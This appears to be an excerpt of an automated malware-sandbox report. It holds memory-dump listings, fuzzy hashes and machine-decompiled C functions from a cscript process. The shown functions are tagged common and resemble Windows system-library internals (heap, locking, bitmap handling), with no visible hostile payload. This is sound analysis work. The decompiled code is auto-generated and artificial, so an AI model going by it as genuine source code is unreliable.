0x054ea6af
0x054ea6b4
0x05529ba7
0x05529bac
0x00000000
0x00000000
0x05529bc6
0x05529bce
0x05529bd1
0x05529bd3
0x05529bd3
0x00000000
0x05529bd1
0x054ea6bd
0x054ea6c3
0x054ea6c6
0x054ea6d2
0x054ea701
0x054ea704
0x00000000
0x054ea704
0x054ea6d4
0x054ea6d6
0x054ea6d9
0x054ea6db
0x054ea6e1
0x054ea6e6
0x054ea6e8
0x054ea6e8
0x054ea6ea
0x00000000
0x054ea6ea
0x054ea688
0x054ea692
0x054ea694
0x054ea699
0x00000000
0x00000000
0x054ea69d
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc3156e51fb81267833029904c30f43ffc3ed1dcbd7325e89a138cca32c14d5
Instruction ID: 39593acbe5de0982143b83ad10a14a7a5f9bbdfc216a8039e4b46d22ee8f2e2d
Opcode Fuzzy Hash: edc3156e51fb81267833029904c30f43ffc3ed1dcbd7325e89a138cca32c14d5
Instruction Fuzzy Hash: 34418DB5A14215DFCF05CF69C494B9ABBF2FB8A301F1580AAE805AB385D774A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054DC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E054DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E054D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05588D34(_v8, _t80);
					}
					E054D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E054CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05588833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E054CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E054FB180();
						if(_a4 != 0) {
							E054D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E054DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E054DBB2D(_t16, _t15);
						E054DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E054CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E054CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E054CFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x054dc18d
0x054dc18f
0x054dc191
0x054dc19b
0x054dc1a0
0x054dc1d4
0x054dc1de
0x05522d6e
0x054dc1e4
0x054dc1e4
0x054dc1e4
0x054dc1ec
0x05522d7d
0x05522d7d
0x054dc1f3
0x054dc1ff
0x05522d88
0x05522d8d
0x05522d94
0x05522d94
0x05522d9f
0x05522da4
0x05522dab
0x05522db0
0x05522db2
0x05522db3
0x05522db4
0x05522dbc
0x05522dc3
0x05522dc3
0x054dc205
0x054dc205
0x054dc208
0x054dc20e
0x054dc211
0x054dc216
0x054dc219
0x054dc21f
0x054dc222
0x054dc22c
0x054dc234
0x054dc23a
0x054dc23f
0x054dc245
0x054dc24b
0x054dc251
0x054dc25a
0x054dc276
0x054dc27d
0x054dc27d
0x054dc25c
0x054dc25c
0x00000000
0x054dc25e
0x054dc1a4
0x054dc1aa
0x054dc1b3
0x054dc265
0x054dc26c
0x054dc26c
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 843372527957d3a2ce8b7035092c74bb2f7d756185ab75081ac2be92276f51c0
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 48311472B05586BAD708EBB5C4A4BEAFB55FF42200F04819FD41857241DB386A0ACBB0

Uniqueness

Uniqueness Score: -1.00%

Function 05537016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05537016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x55ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05536B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05536B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E054D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E054F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E054FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L054D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05537016
0x0553701e
0x0553702b
0x05537033
0x05537037
0x0553703c
0x0553703e
0x05537041
0x05537045
0x0553704a
0x05537050
0x05537055
0x0553705a
0x05537062
0x05537062
0x0553705a
0x05537064
0x05537064
0x05537067
0x05537071
0x05537096
0x0553709b
0x055370a2
0x055370a6
0x055370a7
0x055370ad
0x055370b3
0x055370b6
0x055370bb
0x055370c3
0x055370c3
0x055370c6
0x055370cd
0x055370dd
0x055370e0
0x055370e2
0x055370e2
0x055370ee
0x05537101
0x055370f0
0x055370f9
0x055370f9
0x0553710a
0x0553710e
0x05537112
0x05537117
0x05537118
0x05537118
0x055370bb
0x0553711d
0x05537123
0x05537131
0x05537131
0x05537136
0x0553713d
0x0553713e
0x0553713f
0x0553714a
0x0553714a
0x05537084
0x05537088
0x00000000
0x0553708e
0x0553708e
0x05537092
0x00000000
0x05537092

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00ccb24b026915afd38c62b08539b62d880b403625a45fc4b49eac4389bcffe
Instruction ID: 278e8960e46404eb5a0aa5687b60da8ac3502acf67e745dfb99acdd025ce6bed
Opcode Fuzzy Hash: f00ccb24b026915afd38c62b08539b62d880b403625a45fc4b49eac4389bcffe
Instruction Fuzzy Hash: 0731E872A187419BC310DF28C841B6BB7E5FFC8700F044A1DF89A87690E730E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 054EA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E054EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x55a7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x55a7b10 = 8;
					 *0x55a7b14 = 0x55a7b0c;
					 *0x55a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E054EA990(0x55a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L054EA840(__edx, __ecx, __ecx, _t52, 0x55a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x55a7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x55a7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x55a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L054D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x55a7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E054FF3E0(_t50,  *0x55a7b14, _t8 >> 3);
						_t28 =  *0x55a7b14; // 0x77ad7b0c
						__eflags = _t28 - 0x55a7b0c;
						if(_t28 != 0x55a7b0c) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x55a7b14 = _t50;
						_t48 = _v12;
						 *0x55a7b10 = _t9;
						goto L6;
					}
					 *0x55a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x054ea713
0x054ea714
0x054ea717
0x054ea71d
0x054ea720
0x054ea722
0x054ea727
0x054ea74a
0x054ea754
0x054ea75e
0x054ea768
0x054ea76a
0x054ea773
0x054ea78b
0x054ea790
0x054ea792
0x054ea741
0x054ea741
0x054ea743
0x054ea749
0x054ea749
0x054ea732
0x054ea73a
0x054ea797
0x054ea79d
0x054ea7a3
0x054ea7a9
0x054ea7b6
0x054ea7bc
0x054ea7ca
0x054ea7e0
0x054ea7e2
0x054ea7e4
0x05529bf2
0x00000000
0x05529bf2
0x054ea7ed
0x054ea7f2
0x054ea800
0x054ea805
0x054ea80d
0x054ea812
0x05529c08
0x05529c08
0x054ea818
0x054ea81b
0x054ea821
0x054ea824
0x00000000
0x054ea824
0x054ea7ae
0x00000000
0x054ea7ae
0x054ea73c
0x054ea73e
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d50d9b7bb555008862ce8e46bfa5f6e6e10481495805b439504843702886b2
Instruction ID: 45f959eda17a71479bf8072e7725b38584cc4c91b9da836fc6be035f931e3803
Opcode Fuzzy Hash: 74d50d9b7bb555008862ce8e46bfa5f6e6e10481495805b439504843702886b2
Instruction Fuzzy Hash: EF31AFF27342089BC711CB19D885FAABBFAFB89710F14099BF00587341EB70A905DB91

Uniqueness

Uniqueness Score: -1.00%

Function 054E61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E054E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E054E5E50(0x54967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05589D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E054BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x054e61b3
0x054e61b5
0x054e61bd
0x054e61c3
0x054e61c7
0x054e61d2
0x054e61ff
0x054e61ff
0x054e6201
0x054e6207
0x054e6207
0x054e61d4
0x054e61d9
0x00000000
0x00000000
0x054e61df
0x054e61e2
0x00000000
0x00000000
0x054e61e6
0x054e61e8
0x054e61ee
0x054e61ee
0x054e61f9
0x0552762f
0x05527632
0x05527635
0x05527639
0x05527640
0x0552766e
0x05527675
0x00000000
0x00000000
0x05527681
0x05527689
0x0552768d
0x05527691
0x05527695
0x05527699
0x055276af
0x055276b5
0x055276b7
0x055276b7
0x055276d7
0x055276dc
0x00000000
0x055276dc
0x055276a2
0x055276a9
0x05527651
0x05527653
0x05527653
0x05527656
0x05527656
0x00000000
0x05527656
0x05527644
0x05527646
0x05527648
0x05527648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704dfb754498f2b49322ec21ddfd46f509c34fd85c731250ae1a8b780c0f3ca5
Instruction ID: 94971cd7dd20c59321acdf9fe1378aa16b2d50f272a8ee172f20d9c5443b9137
Opcode Fuzzy Hash: 704dfb754498f2b49322ec21ddfd46f509c34fd85c731250ae1a8b780c0f3ca5
Instruction Fuzzy Hash: B8318B716197118FD760DF19C804B6AF7E5FF98B00F0589AEE8999B391E7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054BAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E054BAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x55ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x55a7b9c; // 0x0
					_t53 = L054D4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E054FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E054FF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L054C6C59(_t53, _t51, _t58) != 0) {
							_t28 = E054E5E50(0x549c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E054EB230(_v32, _v28, 0x549c2d8, 1,  &_v24);
								_t28 = E054BF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x054baa25
0x054baa29
0x054baa2d
0x054baa30
0x054baa37
0x054baa3c
0x05514458
0x05514458
0x05514472
0x05514474
0x05514476
0x054baa64
0x054baa74
0x0551447c
0x05514483
0x05514492
0x054baa52
0x054baa54
0x054baa5e
0x055144a8
0x055144ad
0x055144af
0x055144b6
0x055144b6
0x055144b9
0x055144bc
0x055144cd
0x055144d3
0x055144d6
0x055144e1
0x055144e1
0x055144e6
0x055144e8
0x055144fb
0x055144fb
0x055144e8
0x00000000
0x054baa5e
0x05514476
0x054baa42
0x054baa46
0x054baa48
0x054baa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7036eaf04f11707663a382f2fdead4a4d0c23e99280b708247f76e4cf8c7ddbd
Instruction ID: bb0b1b5ed9c45d632d1ac61da0eb2c5f8224e9da797c81259f17d23da5f4f2de
Opcode Fuzzy Hash: 7036eaf04f11707663a382f2fdead4a4d0c23e99280b708247f76e4cf8c7ddbd
Instruction Fuzzy Hash: 6431BFB1A00219ABDF149F69C981AFFB7B9FF08700B01406AF901EB240E7B49911DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054F8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E054F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x55ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E054E4E70(0x55a86e4, 0x54f9490, 0, 0);
					if( *0x55a53e8 > 5 && E054F8F33(0x55a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x55a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x55a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x549bc46;
						_t48 = E05537B9C(0x55a53e8, 0x549bc46, _t67, 0x55a53e8, _t70,  &_v140);
					}
				}
				return E054FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x054f8ec7
0x054f8ed9
0x054f8edc
0x054f8ee6
0x054f8ee9
0x054f8eee
0x054f8efc
0x054f8f08
0x05531349
0x05531353
0x0553135d
0x05531366
0x0553136f
0x05531375
0x0553137c
0x05531385
0x05531390
0x05531391
0x0553139c
0x0553139d
0x055313a6
0x055313ac
0x055313b2
0x055313b5
0x055313bc
0x055313bf
0x055313c2
0x055313c5
0x055313c8
0x055313cb
0x055313ce
0x055313d1
0x055313d4
0x055313d7
0x055313da
0x055313dd
0x055313e0
0x055313e3
0x055313e6
0x055313e9
0x055313f6
0x05531400
0x05531400
0x054f8f08
0x054f8f32

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f71db07646c786289e3fe23c70a1430316f58b78fabe354615c6495b9111e6b
Instruction ID: c10fa65fa28ead540c43868a4106db9f18aad663b7c2c7af794f78b816e55750
Opcode Fuzzy Hash: 9f71db07646c786289e3fe23c70a1430316f58b78fabe354615c6495b9111e6b
Instruction Fuzzy Hash: E64182B1D00218AEDB14CFAAD981AEEFBF5FB48710F5041AFE549A7241EB705A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054F4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E054F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x55ad360 ^ _t62;
				_v8 =  *0x55ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E054D2280(_t26, 0x55a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E054CFFB0(_t41, _t51, 0x55a8608);
						L2:
						 *0x55ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E054FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E054D2280(_t28, 0x55a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E054CFFB0(_t42, _t53, 0x55a8608);
							if(_t53 != 0) {
								L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E054CFFB0(_t41, _t51, 0x55a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x054f4a2c
0x054f4a34
0x054f4a3c
0x054f4a3e
0x054f4a48
0x054f4a4b
0x054f4a4d
0x054f4a51
0x054f4a9c
0x00000000
0x00000000
0x054f4aa3
0x054f4aa8
0x054f4aad
0x054f4ab1
0x054f4ade
0x054f4ae3
0x054f4a5a
0x054f4a62
0x054f4a6a
0x054f4a6e
0x0552f203
0x054f4a84
0x054f4a88
0x054f4a89
0x054f4a8a
0x054f4a95
0x054f4a95
0x054f4a79
0x054f4a80
0x054f4af2
0x054f4af4
0x054f4af9
0x054f4aff
0x054f4b01
0x054f4b03
0x054f4b08
0x0552f20a
0x0552f212
0x0552f216
0x0552f216
0x054f4b08
0x054f4b13
0x054f4b1a
0x0552f229
0x0552f229
0x054f4b1a
0x054f4a82
0x00000000
0x054f4a82
0x054f4ab7
0x054f4acd
0x054f4acd
0x054f4ad5
0x054f4ada
0x00000000
0x054f4ada
0x054f4ac2
0x054f4acb
0x00000000
0x00000000
0x00000000
0x054f4acb
0x054f4a53
0x054f4a53
0x054f4a58
0x00000000

Memory Dump Source

